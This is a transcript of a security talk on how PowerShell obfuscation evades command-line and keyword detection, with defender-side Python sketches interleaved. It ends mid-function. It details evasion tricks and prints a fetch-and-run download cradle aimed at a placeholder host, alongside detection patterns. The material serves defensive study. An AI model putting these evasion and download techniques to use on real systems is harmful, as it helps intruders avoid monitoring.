>>And my name is Daniel Bohannon. I’m a consultant [inaudible]. I’ve been doing incident response [mic quits working] been doing incident response consulting with Mandiant for the past 2 years, and I actually recently switched over to a senior applied security researcher position, so I’m getting to do a lot more of this stuff, which is really exciting. I’m also the author of the Invoke-Obfuscation and Invoke-CradleCrafter PowerShell obfuscation frameworks. >>Thanks, D-Bo! [applause] Alright, so to hit the stage here, we’re gonna talk a little bit about a treatise on blue team follies. As it stands today, the majority of people just use regular command line logging: they look for processes like PowerShell launching with malicious encoded commands. What we’re gonna do is go down into some of the depths of how that can be dangerous, especially when you’ve got some bad assumptions going on. Of course, you can’t get any of this intelligence unless you’ve got logging enabled. So make sure you’ve got command line logging enabled, that’s event 4688, or you can also get it from Sysmon, and also that you’ve got PowerShell script block logging enabled, because PowerShell version 5 brought in tons and tons of awesome security stuff, and attackers aren’t in the habit of enabling this stuff for you, so if you care about it you might as well do it first. So let’s talk about what people do when they’re actually trying to build detections for malicious PowerShell. You’ll see here, maybe they say, whenever I see powershell -Command, I’m gonna take a look at those encoded arguments and write some detections based on those. Well, PowerShell help, much like everything else, is the best in the business. Turns out that you don’t only have to use direct input to powershell -Command.
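As a defender-side illustration of keying on encoded commands in process command lines, here is a minimal Python sketch that pulls an -EncodedCommand argument out of a logged command line and decodes it. It assumes the argument is Base64 over UTF-16LE text (which is what powershell.exe expects) and that the command line is already available as a string from 4688 or Sysmon data; decode_encoded_command is a hypothetical helper, and the regex is not a complete parser of powershell.exe argument rules.

```python
import base64
import re
from typing import Optional

# Matches -e, -ec, -en, -enc, ... -EncodedCommand (case-insensitive) followed by
# a Base64 argument. -ExecutionPolicy / -exec / -ep do not match, because the
# letter after "e" must be "c" or "n" (or whitespace).
_ENCODED_ARG = re.compile(r"\s-e(?:c|n\w*)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if there is none."""
    match = _ENCODED_ARG.search(cmdline)
    if match is None:
        return None
    try:
        # powershell.exe expects Base64 of UTF-16LE text.
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # binascii.Error and UnicodeDecodeError both subclass ValueError
        return None


if __name__ == "__main__":
    payload = base64.b64encode("Write-Output hi".encode("utf-16-le")).decode("ascii")
    print(decode_encoded_command(f"powershell.exe -NoP -enc {payload}"))
```

This only helps when the payload actually appears on the powershell.exe command line, which is exactly the assumption the rest of the talk takes apart.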
You can also send those commands in through standard input, like many other automation tools you’re used to. So here’s an example of using this technique: if I’m taking some PowerShell commands and dumping them in through PowerShell’s standard input, and all you’re looking at is the content of the PowerShell command lines, you’re gonna miss the stuff that went in there. So this is what it looks like when you look at the 4688 command line logs for PowerShell itself. You don’t see the actual command that was run. One little note here: this little blue shield marks stuff that will still show up in your PowerShell logs, so while this won’t show up in the 4688 event, it will show up in the PowerShell logs. That looks kind of bad, but what you do see is that if you look at the parent process command line, the cmd itself, somebody was trying to jam a bunch of input into PowerShell, so maybe you start thinking about doing some detections based on that. So here’s a question: do we start keying anytime cmd is calling PowerShell? That might be useful. But here’s the thing: with cmd, you can also declare in an environment variable what process it should call. So here’s an example of splitting powershell into chunks across two environment variables and then having cmd call that. You can do all kinds of obfuscation with environment variables, so if you’re only doing detections based on cmd that way, you’re at some risk for sure. This is an example from FIN8, a financially motivated attacker, doing a bunch of this stuff embedded in a VBA macro. Ring a bell? Yes, absolutely, that’s what you just saw. They’re using late-bound cmd piping into PowerShell to get their stuff done and avoid this command line detection.
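A minimal Python sketch of the parent-process idea: flag a cmd.exe command line that visibly pipes into powershell. The rule and the helper name pipes_into_powershell are hypothetical. The last test case stands in for the environment-variable trick, where the literal process name never appears after the pipe, so the rule misses it.

```python
import re

# Hypothetical rule: a parent cmd.exe command line that pipes text into a
# process literally named "powershell" (optionally with .exe).
_PIPE_TO_POWERSHELL = re.compile(r"\|\s*powershell(?:\.exe)?\b", re.IGNORECASE)


def pipes_into_powershell(parent_cmdline: str) -> bool:
    """True if the parent command line visibly pipes into powershell."""
    return _PIPE_TO_POWERSHELL.search(parent_cmdline) is not None


if __name__ == "__main__":
    plain = "cmd /c echo Write-Output hi | powershell -"
    # Illustrative string only: the process name is split across two
    # environment variables, so the literal word never follows the pipe.
    split_name = "cmd /c echo Write-Output hi | %a%%b% -"
    print(pipes_into_powershell(plain), pipes_into_powershell(split_name))
```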
But you don’t only have to send things in through standard input. Here’s an example at the bottom of just using an environment variable directly and having PowerShell invoke the content of that environment variable. Kovter uses this as well, so if you’re only looking at the PowerShell command line, you’re kind of screwed. What about the clipboard? Here’s a good example of just using the clipboard as an information passing mechanism. You do see these things in the command lines, but this is starting to get really, really tough. So you might say, what if we just apply detection whenever cmd is calling PowerShell, and start doing detections based on that process chain? That’s the kind of thing you see a lot in HIDS products. But here’s the thing: when I run this sort of launch technique and dump anything into PowerShell, what if in a parent cmd I set an environment variable, then tell a child cmd to run the thing in that environment variable, and that thing is what actually calls PowerShell? If you’re only detecting cmd calling PowerShell, yeah, you’re gonna miss that. So this would be kinda cool if it works. Nah, not quite; nearly, but unfortunately we’re not gonna get there. However, with the magic of cmd escaping, all I need to do is escape that one last pipe so that the initial cmd stops interpreting it. There we go! Yeah! The second cmd, you can’t tell what it’s doing, and then finally somehow PowerShell is getting involved. So obviously what we’re gonna do here is recursively check all the way up the parent process tree, combine all of those command line arguments, get rid of all that obfuscation, and figure it out. That’s the natural thing to do, and then we’re gonna save the day and be good.
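The "walk up the parent process tree and combine the command lines" approach could be sketched in Python as follows. ProcessEvent and its fields are assumptions standing in for whatever your process-creation logs (4688, Sysmon) provide; the walk stops at unknown parents, PID cycles, or a depth limit.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass
class ProcessEvent:
    """One process-creation record (fields are assumptions, e.g. from 4688/Sysmon)."""
    pid: int
    ppid: Optional[int]
    cmdline: str


def ancestry_cmdlines(events: Dict[int, ProcessEvent], pid: int, max_depth: int = 32) -> List[str]:
    """Command lines from pid up through its ancestors, child first.

    Stops at an unknown parent, a PID cycle, or max_depth.
    """
    chain: List[str] = []
    seen = set()
    current = events.get(pid)
    while current is not None and current.pid not in seen and len(chain) < max_depth:
        seen.add(current.pid)
        chain.append(current.cmdline)
        current = events.get(current.ppid) if current.ppid is not None else None
    return chain


def combined_context(events: Dict[int, ProcessEvent], pid: int) -> str:
    """Join the ancestry oldest-first so a reviewer reads it in launch order."""
    return " => ".join(reversed(ancestry_cmdlines(events, pid)))
```

As the talk points out next, this reconstruction does nothing for input passed through window titles, files, registry keys, or any other channel outside the parent chain.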
Unfortunately not. There are a ton of ways to give input to PowerShell that don’t involve any sort of parent process chain. For example, you launch one window and set the commands in its window title, then launch another window, a sibling, to scrape that window title. You can use files, you can use registry keys, any information passing mechanism you can imagine beyond environment variables, and that’s gonna blow through any sort of parent process tree detection. The good news, as we mentioned back there, is that PowerShell script block logging will catch all these shenanigans, but if you’re in an environment where the defenders are only looking at the command line logs, you’re done. However, at this point we’ve only been talking about process command chains. We haven’t even talked about the PowerShell content itself and the ways through that. >>Yes, let’s look at this content itself. So again, say you’re really on top of things: you’re looking at all process command lines, and you’re also taking into account PowerShell script block logging. Are there any pitfalls we need to be aware of as defenders, and are there any tools you can use as a red teamer to evade the detection you’re going up against? So we’re going to take a very rapid-fire example, looking at what we call the remote download cradle. The remote download cradle at the top here is basically copied and pasted everywhere; it’s in all the major frameworks you can think of, and attackers love this stuff. It’s a one-liner that downloads a remote script into memory and then passes it to Invoke-Expression, or IEX, which is basically PowerShell’s eval statement, if you will.
So let’s play a little red team, blue team. Here we have our attacker command at the top, this remote download cradle, and as a defender, what if we say, okay, I’m interested when I see Invoke-Expression, New-Object System.Net.WebClient, and .DownloadString('http? Would this catch this command? It will catch that command right here, but let’s go through a little obfuscation exercise and see what pitfalls are out there. First, wherever we see System., that’s really not necessary in PowerShell. PowerShell will automatically prepend System. for the .NET class, so if an attacker doesn’t have to have it in their command, then as defenders we definitely don’t want to make that assumption in our trigger terms down here, so we’re gonna remove it from both. Next, the URL: this is just a string, so you can do stuff like, I don’t know, [inaudible]. You’re also not limited to double quotes; you can use single quotes, you can put whitespace there, you can set it as a variable elsewhere. There are a lot of things you can do here, so we’re just gonna remove that http part from the DownloadString portion of the detection. Let’s keep going: DownloadString. DownloadString is actually one of many methods in the Net.WebClient class, and it’s the most common one we see attackers using, but it’s definitely not the only one. This is just part of the list: DownloadString, DownloadFile, DownloadData, each returning a different format: a string you can run as an expression, a file on disk, or, for DownloadData, a byte array. So maybe as defenders we say, okay, let’s just shorten it to .Download and make sure we capture all these options up here. So that’s what we’ll do.
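The progressive loosening of trigger terms can be illustrated with a simple substring matcher. This Python sketch assumes detection is a case-insensitive "all terms present" check; the two term lists mirror the walkthrough, and the example.com URL is a placeholder.

```python
from typing import Iterable

# The cradle from the talk, with a placeholder URL.
CRADLE = ("Invoke-Expression (New-Object System.Net.WebClient)"
          ".DownloadString('http://example.com/a.ps1')")

# First-draft trigger terms versus the loosened terms from the walkthrough.
STRICT_TERMS = ["invoke-expression", "new-object system.net.webclient", ".downloadstring('http"]
LOOSE_TERMS = ["invoke-expression", "new-object", "net.webclient", ".download"]


def matches_all(command: str, terms: Iterable[str]) -> bool:
    """Case-insensitive check that every trigger term appears in the command."""
    lowered = command.lower()
    return all(term in lowered for term in terms)


if __name__ == "__main__":
    variant = ('$wc = New-Object Net.WebClient; '
               'Invoke-Expression $wc.DownloadString("http://example.com/a.ps1")')
    print(matches_all(CRADLE, STRICT_TERMS),   # the original cradle is caught
          matches_all(variant, STRICT_TERMS),  # dropping "System." and using a variable evades it
          matches_all(variant, LOOSE_TERMS))   # the loosened terms catch the variant again
```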
Also, this parenthesis isn’t really necessary. We can start to chop up this PowerShell command and set pieces of it in variables. For example, some frameworks out there will take New-Object Net.WebClient and put it in a variable, typically called $wc for WebClient, and then you just have the variable name followed by .DownloadString. So let’s remove that parenthesis from the .Download portion of the trigger. Now, from a PowerShell perspective, why would this dot be problematic? How could an attacker get around that .Download to evade this detection? Well, DownloadString, from a PowerShell token perspective, is actually a member, and there are some things we can do with member tokens in a PowerShell command. We can throw single quotes around it, we can also throw double quotes around it, and if you look really closely at DownloadString (I promise this next slide works), we can just add a tick mark and it still runs. Now why the tick mark? What is this? Well, the tick mark is the escape character, or the grave accent character. I like to think of it as the grave of a lot of defensive ideas I thought were really good that ended up getting broken by this. We can actually put these in front of any character that has no escape meaning. You see the 8 characters here, like `0 for null and `n for newline, that sort of thing, but as long as we place the ` before something that’s not one of those characters, we’re good.
If you’re like me and you’re really OCD and you really wanna put a ` in front of those characters too, all you have to do is uppercase them and it totally works. So now we can put ticks in front of any character we want in the method name, as long as it’s in double quotes. Now here’s the scary part: those ticks are in the command line logs, so if you have some real-time agent, they’re in the command line argument details themselves, and they actually persist all the way into PowerShell script block logs. The place where this obfuscation doesn’t have any effect is PowerShell module logging, event ID 4103. So PowerShell’s logging is really, really robust; sometimes you just have to look in a lot of different places, but all the evidence is there. So as defenders we can try to regex all this stuff to catch all these tick marks, or maybe we should just give up on this, I don’t know. If you’re really brave and wanna do a regex, keep in mind the OpenRead method, which returns a stream instead of a byte array or an expression. However, I wouldn’t recommend a regex, because if you throw parentheses around the member, you can treat it as a legit string and start doing concatenation, set chunks in variables, reverse it, do whatever you want. And the .Invoke you’ll see in these two examples is only required for PowerShell 2; it’s not required for PowerShell 3 or later. Invoke-Obfuscation uses that .Invoke so its output works on PowerShell 2 and later, but you actually don’t have to have it, so make sure as a defender you’re not basing your defenses on that .Invoke portion. So let’s just remove that from our indicators.
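Two common defender reactions to tick marks can be sketched in Python: stripping backticks before matching, or writing a tick-tolerant regex. Both helpers are hypothetical. The concatenated test string shows that either approach still misses a member name that was turned into a string and split, which is the point made above.

```python
import re


def strip_ticks(text: str) -> str:
    """Drop every backtick before matching.

    This also destroys real escapes such as `n, which is acceptable for
    indicator matching but not for reconstructing the script (assumption).
    """
    return text.replace("`", "")


def tick_tolerant(word: str) -> "re.Pattern[str]":
    """Regex matching word with any number of backticks between its characters."""
    return re.compile("`*".join(re.escape(ch) for ch in word), re.IGNORECASE)


if __name__ == "__main__":
    ticked = '$wc."Do`wnl`oa`dStr`ing"("http://example.com/a.ps1")'
    concat = '$wc.("Down"+"loadString").Invoke("http://example.com/a.ps1")'
    rule = tick_tolerant("DownloadString")
    print(bool(rule.search(ticked)), bool(rule.search(concat)))  # caught, missed
```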
So, Net.WebClient, really briefly: from a PowerShell token perspective, it’s an argument to the New-Object cmdlet. We can use double quotes and tick marks, we can wrap it in parentheses and concatenate it, chunk it into variables, tons of options. We’ll just go with the first one. There we go. New-Object: now, PowerShell is super inviting to newcomers learning the language because there are so many aliases. For example, if you wanna list the files in a directory, you can use PowerShell’s Get-ChildItem cmdlet; if you’re lazy you can just type gci; if you come from a Windows background you can type dir; if you come from a Linux background you can type ls, and it all works. So as defenders we have to be really careful to understand all the options available in PowerShell from a pure syntax perspective, regardless of any kind of obfuscation. The nice thing is that New-Object has 0 aliases, so initially I thought, hey, this is gonna be a really solid indicator as a defender. However, PowerShell is really good at helping you find stuff that you know is out there but can’t remember the name of. For example, if I’m looking for a command that starts with New- and I only remember part of the name, I can just type Get-Command with a wildcard, and it will return all the matching commands as PowerShell objects. If it returns just a single object, I can pass that to Invoke-Expression, which will automatically convert that command to a string and then invoke it. However, as attackers we can be a little more creative than this. Instead of Invoke-Expression, why don’t we use a dot or an ampersand? And what are these guys? They’re invocation operators, and here they take the PowerShell object returned from Get-Command and invoke it directly. But we can have even more fun. Remember those wildcards?
That is New-Object, so is that, and so is every combination you can think of: as long as Get-Command returns just New-Object, that sucker’s gonna run, and as a defender you’re not seeing New-Object anywhere in the command line or in script block logging. Pretty crazy, right? And it doesn’t stop there, because Get-Command has an alias of gcm, and, if you promise not to tell anyone, there’s also an undocumented alias for Get-Command, and that is just Command. Because PowerShell, again, is like your best friend: it’s really, really helpful and doesn’t want to make you look silly, so if you just type Command, it checks, hey, is there a Get-Command? There is? Solid, that’s what you were looking for, and that works. So anytime you’re building defenses based on Get-something, don’t count on that Get- being there, because it absolutely doesn’t have to be. In addition, for Get-Command, if you don’t wanna use wildcards, you can set the cmdlet name into variables like this, using PowerShell 1.0 syntax. If you’re a defender and you’re not looking for the $ExecutionContext automatic variable, you absolutely want to be, because it is really, really awesome. And if you’re a red teamer, you definitely want to check this out. Here are just a couple of ways you can call Get-Command or some of its similar counterparts using this 1.0 syntax. In addition to all the Get-Command stuff we just covered, you can do the exact same thing with Get-Alias, gal, or Get-Alias’s own alias, which is just Alias, using the alias name instead of the cmdlet name. So there’s a lot going on there; why don’t we just choose this gcm *w-O* example right there. It’s getting a little crazy, and in addition to all these things, we can throw tick marks in front of them, because they’re cmdlets.
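To see why a wildcard lookup hides the literal command name, here is a rough Python approximation using fnmatch. It assumes PowerShell wildcards behave like case-insensitive shell globs for these simple patterns, and the COMMANDS list is a tiny hypothetical stand-in for a real session.

```python
from fnmatch import fnmatchcase
from typing import List, Sequence

# Hypothetical, tiny stand-in for the commands available in a session.
COMMANDS = ["New-Object", "New-Item", "New-Alias", "Get-ChildItem",
            "Invoke-Expression", "Write-Output", "Set-Variable"]


def resolve_wildcard(pattern: str, commands: Sequence[str] = COMMANDS) -> List[str]:
    """Approximate PowerShell's case-insensitive wildcard lookup with fnmatch."""
    lowered = pattern.lower()
    return [name for name in commands if fnmatchcase(name.lower(), lowered)]


if __name__ == "__main__":
    for pattern in ("*w-O*", "N*-O*t", "New-*"):
        print(pattern, "->", resolve_wildcard(pattern))
```

A pattern that resolves to exactly one name is all an attacker needs; the literal string New-Object never has to appear in the logged text.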
You could also just use the invocation operators against the string 'New-Object' and concatenate it, or use what’s called the -f format operator to literally reorder the substrings you just chopped up. Some people say, well, I’ll just remove all special characters from the event logs, and once I remove the quotes and the pluses, a concatenated New-Object will come back together. However, that’s not foolproof, because with these reordering techniques you’ll never see the string New-Object come back together. So we can try to regex all the things, or just give up. I wanna be a realist here and just go ahead and pass on this one. So we’re left with Invoke-Expression, which is a freaking awesome indicator, especially on the command line. Invoke-Expression: you definitely want to be looking for this. What are some things we need to keep in mind with it? Well, it has an alias of IEX, which is typically what you see. The ordering doesn’t matter: you can say Invoke-Expression $expression, or pipe an expression into Invoke-Expression. You can throw in tick marks because it’s a cmdlet, and you can use the invocation operators with concatenation and reordering. And fun fact: as part of our research, which we’ll talk about in just a second, we assembled a massive PowerShell corpus, a lot of scripts, and we’ll get into the numbers shortly. But basically only 3 percent of the scripts actually contained IEX or Invoke-Expression. Pretty interesting. One thing we have to keep in mind, though, is that Invoke-Expression has a cousin called Invoke-Command. Invoke-Expression expects an expression and Invoke-Command expects a script block; typically Invoke-Command is used to run a command on a remote system, but if you never specify a computer name, it runs locally. So what does that mean from a defender’s perspective?
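The "strip the special characters so the concatenation collapses" idea, and why reordering defeats it, can be sketched in Python as follows. collapse_concatenation is a hypothetical normalization written for illustration, not a tool from the talk.

```python
import re

_QUOTES_AND_TICKS = re.compile(r"[\"'`]")
_PLUS = re.compile(r"\s*\+\s*")


def collapse_concatenation(text: str) -> str:
    """Hypothetical normalization: drop quotes/backticks, then join across '+'."""
    return _PLUS.sub("", _QUOTES_AND_TICKS.sub("", text))


if __name__ == "__main__":
    concat = "&('New-Ob' + 'ject') Net.WebClient"
    reordered = "&('{1}{0}' -f 'ject','New-Ob') Net.WebClient"
    print(collapse_concatenation(concat))     # New-Object comes back together
    print(collapse_concatenation(reordered))  # the -f reordering never reassembles it
```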
Well, with Invoke-Command we have the alias icm, the dot and ampersand invocation operators also work, and then you have methods like .Invoke(), .InvokeReturnAsIs(), .InvokeWithContext(), etcetera. A lot of options there, but typically you’ll see script blocks in curly braces like we see here. In addition, with PowerShell 1.0 syntax, there’s that $ExecutionContext thing I was telling you about earlier, right? It has an InvokeScript method, which can handle both expressions and script blocks. So let’s add tick marks to all of these, because they’re cmdlets. But how in the world as a defender can we start keying off of an ampersand or a dot? That seems really bound for false positives. So what if we say, okay, I’m only interested if there’s a dot or ampersand and there are also curly braces, because curly braces are the only way you can denote a script block literal in PowerShell? If only it were that simple. You can convert an expression to a script block, and here are two examples of that: the ScriptBlock class’s Create method, or, again with $ExecutionContext and PowerShell 1.0 syntax, the NewScriptBlock method. And you can obfuscate all of these just like we’ve been doing all along. So every single layer can be obfuscated to the extreme, and it sticks: the obfuscation is there in the command line arguments and also in script block logs. In Invoke-CradleCrafter, a tool I released a couple of months ago- >>Thanks, D-Bo >>Hahah, sorry Lee, I have to deal with it myself actually, so we’re in the same boat there. But it actually has over 10 different invocation options, so there’s a lot of cool stuff there. >>[sigh] That is brutal, can you imagine trying to defend against that? God. Well, now that you’re done with that, let’s [phew] that’s brutal >>Yeah, fortunately, that’s really the extent of what you can do with PowerShell obfuscation. Nah, I’m totally kidding, there’s way more.
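The "dot or ampersand followed by curly braces" heuristic is easy to express as a regex, which also makes its blind spot obvious: an expression converted with the ScriptBlock Create method or NewScriptBlock never contains a literal brace. The pattern below is a hypothetical Python sketch, not a recommended production rule.

```python
import re

# Hypothetical heuristic: an invocation operator (& or .) directly followed
# by a literal script block in curly braces.
_INVOKE_LITERAL_BLOCK = re.compile(r"[&.]\s*\{")


def invokes_literal_script_block(script: str) -> bool:
    """True if the text invokes a literal { ... } script block with & or ."""
    return _INVOKE_LITERAL_BLOCK.search(script) is not None


if __name__ == "__main__":
    for sample in ("& { Write-Output hi }",
                   "&([ScriptBlock]::Create($cmd))",
                   "$ExecutionContext.InvokeCommand.NewScriptBlock($cmd).Invoke()"):
        print(invokes_literal_script_block(sample), sample)
```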
[laughter][applause] What if we just take that? So after all of that, what if we then say, hey, totally f’d up PowerShell command, why don’t we make you a string, reverse you on the command line, and reverse you back in memory? Here are some examples of that. We can also put garbage delimiters in the command and then basically split and join to remove them. We can use replace methods to remove and replace those garbage delimiters. We can do any kind of concatenation we want. And wouldn’t it suck if there were a tool out there that did all this by default? [laughter] Horrible, horrible, ha. So anyways, Invoke-Obfuscation may or may not do that. Let’s take the same download cradle we started with, and instead of going through, I don’t know, a 10-minute example of all these different things, we can literally at the click of a button say, yeah, just randomly obfuscate all the tokens in there, and produce something like this. You could then say, if you’re really twisted, let me take this and do some string obfuscation on top, like that reordering right there. Fun fact: I spent a lot of time recently decoding this stuff, because APT32, a nice Vietnamese APT group also known as OceanLotus, happens to like this combo quite a bit. They’ll do one layer of Token\All and then literally 5 or 6 layers of this string stuff. So I’ve gotten a lot of practice, Lee- >>You make your bed, you lay in it, man >>I’m telling you man, I’m telling you. So how might obfuscation with Invoke-CradleCrafter look different?
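On the defending side, a single layer of reversal or garbage-delimiter splitting can sometimes be peeled by brute force: try a few simple inverse transforms and keep the ones that produce recognizable PowerShell. This Python sketch assumes a small keyword list and a handful of candidate delimiters, all hypothetical; real samples like the multi-layer ones just described would need many more transforms applied recursively.

```python
from typing import Iterator, List, Tuple

# Hypothetical keywords used to decide whether a candidate reads as PowerShell again.
KEYWORDS = ("new-object", "downloadstring", "invoke-expression", "iex")


def looks_like_powershell(text: str) -> bool:
    lowered = text.lower()
    return any(keyword in lowered for keyword in KEYWORDS)


def candidate_decodings(payload: str,
                        delimiters: Tuple[str, ...] = ("~", "|", "#")) -> Iterator[Tuple[str, str]]:
    """Yield (description, text) for a few simple reversible transforms."""
    yield "as-is", payload
    yield "reversed", payload[::-1]
    for delim in delimiters:
        if delim in payload:
            joined = "".join(payload.split(delim))
            yield f"split on {delim!r} and joined", joined
            yield f"split on {delim!r}, joined, reversed", joined[::-1]


def peel_one_layer(payload: str) -> List[str]:
    """Descriptions of the transforms whose output looks like PowerShell."""
    return [desc for desc, text in candidate_decodings(payload) if looks_like_powershell(text)]
```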
In Invoke-Cradle- >>Thanks, D-Bo >>[laughter] Invoke-CradleCrafter actually doesn’t use any tick marks. It uses substitutions: instead of concatenating DownloadString or using tick marks, it enumerates all the methods available on New-Object Net.WebClient, and maybe, like, the 37th one resolves to the string DownloadString, so it uses all that kind of substitution. So wouldn’t it be terrible if there were actually new and worse obfuscation techniques that just hit the market, like, three days ago? >>Thanks, D-Bo >>[laughter] Sorry, I’ve been sitting on this one for like 6 months, so I’ve gotta get it out there: what if it’s all special characters? [laughter] [applause] Now, I have to say up front, kudos, this was not my original idea: a Japanese security researcher named Mutaguchi wrote Hello World entirely in special characters using this technique back in 2010, so props to Mutaguchi, this is really, really freakin’ cool. It’s basically just a lot of different variables, and it’s definitely interesting to read his blog post on how he came up with this. Those variable names could also just be different amounts of whitespace. [laughter] And then I was chatting with Casey Smith, or subTee, and he said, oh, that looks kind of similar to whitespace encoding. And I said, say what? He said, yeah, you know, whitespace and tab encoding. And I was like, that sounds amazing, let’s do that right now, so that’s the second one I released [laughter]. So the entire command is either spaces delimited by tabs or tabs delimited by spaces, and there’s a nice little stub decoder at the end. So that’s out there now. And this is pretty much what defenders feel like, right? [laughter] And I am a defender; it’s my job to come up against this stuff, but- >>As you can tell, he’s a noted blue teamer.
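The exact format Invoke-Obfuscation uses for whitespace encoding is not spelled out in the talk, so this Python sketch uses a hypothetical scheme (one run of spaces per character, its length equal to the character code, runs separated by tabs). It serves only to show why such output is trivial to spot: essentially every character is whitespace.

```python
def encode_whitespace(command: str) -> str:
    """Hypothetical scheme: each character becomes a run of spaces whose
    length equals its code point, and runs are separated by tabs."""
    return "\t".join(" " * ord(ch) for ch in command)


def decode_whitespace(encoded: str) -> str:
    """Inverse of encode_whitespace."""
    if not encoded:
        return ""
    return "".join(chr(len(run)) for run in encoded.split("\t"))


def whitespace_ratio(text: str) -> float:
    """Fraction of characters that are spaces or tabs: a crude defender-side signal."""
    if not text:
        return 0.0
    return sum(ch in " \t" for ch in text) / len(text)


if __name__ == "__main__":
    encoded = encode_whitespace("Write-Output hi")
    print(len(encoded), whitespace_ratio(encoded), decode_whitespace(encoded))
```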
>>Hahaha [laughter] >>You’re a masochist >>[laughter] So I feel really bad now, I feel a guilt trip. Is there anything we can do for defenders out there? >>I guess not... hold on, we’re just getting into this presentation; I think there’s some stuff we can do. So you might think, hey, how in the world as a defender looking at your logs are you EVER going to find any of that stuff? Hands up, you’re kind of screwed. So we decided to dabble a little bit. We’re not data scientists, nothing like that; we just decided to play around. Here’s a core point, though: you don’t need to decode everything in there. All you need to know is that it exists. When any of us takes a look at that, it’s obvious it’s not normal stuff at all. What attackers are using as this amazing cloak of invisibility, we can do some smart stuff with and turn into a shining laser. If you see stuff like this in your network, you should take a look; you don’t need logging tools or regexes telling you what it’s doing, just apply a bit of wetware and you’re going to be in good shape. Now, how can we do that, though? It sounds simple. One of the cool things you can do is look at simple character frequencies. Going back to the big PowerShell corpus we made, here on the right-hand side is an example where we did character frequency analysis against all of the scripts in PoshCode, a popular PowerShell script sharing repository. It looks kind of like English; if you’ve ever done any simple crypto, you’ll recognize those character frequencies. On the left-hand side, you see the character frequencies of some of the obfuscated scripts we just showed. Very, very clearly different, right? You’ve got a bunch of backticks and square brackets; this really, really stands out.
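Character frequency analysis itself takes only a few lines. This Python sketch computes relative, case-folded character frequencies for one script. It illustrates the idea; it is not the code that was run against the PoshCode corpus.

```python
from collections import Counter
from typing import Dict, List


def char_frequencies(script: str) -> Dict[str, float]:
    """Relative frequency of each character (case-folded) in a script."""
    if not script:
        return {}
    counts = Counter(script.lower())
    total = sum(counts.values())
    return {ch: n / total for ch, n in counts.items()}


def top_chars(script: str, n: int = 5) -> List[str]:
    """The n most frequent characters, ties broken alphabetically."""
    freqs = char_frequencies(script)
    return sorted(freqs, key=lambda ch: (-freqs[ch], ch))[:n]


if __name__ == "__main__":
    print(top_chars("Get-ChildItem -Path C:\\Temp | Where-Object { $_.Length -gt 100 }"))
    print(top_chars("${`[}=+$();${`]}=${`[}"))  # punctuation dominates
```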
So the question is: okay, yeah, it’s a list of numbers, but how am I supposed to figure out how similar those lists of numbers are? There’s a tool for that! There’s a whole community called information retrieval, and they build things like search engines, where they go off and analyze web pages and documents, extract different features and numbers, and then compare those big lists of numbers to find lists that are similar. We’re used to this from high school and graph paper: you’ve got two numbers that represent one line, another two numbers that represent another line, and you can take the cosine of the angle between them. You can do a little math here on the right (it makes us look smart, so we put it up there and I’m pretty proud of that) to compare those lines and figure out how similar they are using the cosine. Turns out the information retrieval folks like to do this with more than two numbers: more than two dimensions, more than three dimensions, maybe a thousand or two thousand dimensions. At that point you’re talking about the angle between two three-thousand-dimensional lines. I’m having a hard time picturing it, but it’s possible, and it gives you a number. So here’s an example of actually running that. You don’t need to read all of the PowerShell, it’s just PowerShell, but what you can see here is a huge grouping near the top: most of these scripts have very similar cosine similarity. But then these obfuscated ones stick right out: 0.157, 0.379. This is an atomic bomb. Take a look at the average similarity across all of PoshCode: there’s a massive grouping up here. And if you take a look at everything below 0.8, which we did, these things are almost all obfuscated.
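Cosine similarity between a script’s character counts and a baseline built from normal scripts can be sketched as below. The baseline scripts and examples are illustrative assumptions, and the 0.8 default threshold simply reuses the cut-off mentioned in the talk; the docstring gives the standard cosine of the angle between two vectors.

```python
import math
from collections import Counter
from typing import Iterable, Mapping


def char_vector(text: str) -> Counter:
    """Character counts (case-folded); cosine similarity ignores overall scale."""
    return Counter(text.lower())


def cosine_similarity(a: Mapping[str, float], b: Mapping[str, float]) -> float:
    """cos(theta) = (a . b) / (|a| |b|), with missing characters counted as 0."""
    dot = sum(value * b.get(key, 0.0) for key, value in a.items())
    norm_a = math.sqrt(sum(v * v for v in a.values()))
    norm_b = math.sqrt(sum(v * v for v in b.values()))
    if norm_a == 0.0 or norm_b == 0.0:
        return 0.0
    return dot / (norm_a * norm_b)


def baseline_vector(scripts: Iterable[str]) -> Counter:
    """Pool character counts from a corpus of (mostly) normal scripts."""
    total: Counter = Counter()
    for script in scripts:
        total.update(script.lower())
    return total


def looks_obfuscated(script: str, baseline: Mapping[str, float], threshold: float = 0.8) -> bool:
    """Flag scripts whose character profile is far from the baseline."""
    return cosine_similarity(char_vector(script), baseline) < threshold
```

In practice the baseline would come from a large corpus like PoshCode rather than a couple of sample lines, and the threshold trades false positives against false negatives.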
And when they weren’t intentionally obfuscated, they were things like code golf competition entries, where people write garbage anyway. So if we could somehow automate this cosine similarity, problem solved: run it on your logs, run it on your network, and you’re good to go. >>So these data points were generated, again, from all the scripts on PoshCode, which is about 3,400 scripts, I believe, so we really wanted more data. Microsoft has been thinking about this for a while: last spring they ran a little contest called Underhanded PowerShell, where they invited the red team community to submit obfuscated and underhanded PowerShell commands that performed a very specific task while getting around certain Script Analyzer detection rules that were in place. So that was kind of neat. On top of that data, there’s a lot of PowerShell out there in the community that we wanted to gather, so we created a ginormous PowerShell corpus. >>Ginormous >>But since we’re both gentlemen, we did it politely. Now, what do I mean by that? Well, this is code that Lee wrote to scrape GitHub, for example, and if you look at those little blue portions, that’s the code that actually downloads the script. All those red portions are blatantly Canadian, because Lee is Canadian and it’s very polite: throttling, ah, it’s so nice, so kind. So anyways, we politely scraped. Actually, fun fact here: you were scraping GitHub for quite a while. >>Yeah, mad props to GitHub. So we took a look at all the repositories and figured it would take about a month. There were like 11 million repositories to scrape through, [clears throat] so I spent a month straight just downloading, downloading, throttle; downloading, downloading, throttle. A month later it’s like, look at my repository index: 12 million, 13 million, that doesn’t make sense.
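Lee’s scraper itself isn’t shown in this transcript, so the following is only a hypothetical Python sketch of the "downloading, downloading, throttle" pattern. The fetch and sleep functions are injected so the throttling can be tested without network access, and the batch size and delay defaults are placeholders, not the values used for the real corpus.

```python
import time
from typing import Callable, Dict, Iterable


def polite_fetch(urls: Iterable[str],
                 fetch: Callable[[str], bytes],
                 batch_size: int = 2,
                 delay_seconds: float = 1.0,
                 sleep: Callable[[float], None] = time.sleep) -> Dict[str, bytes]:
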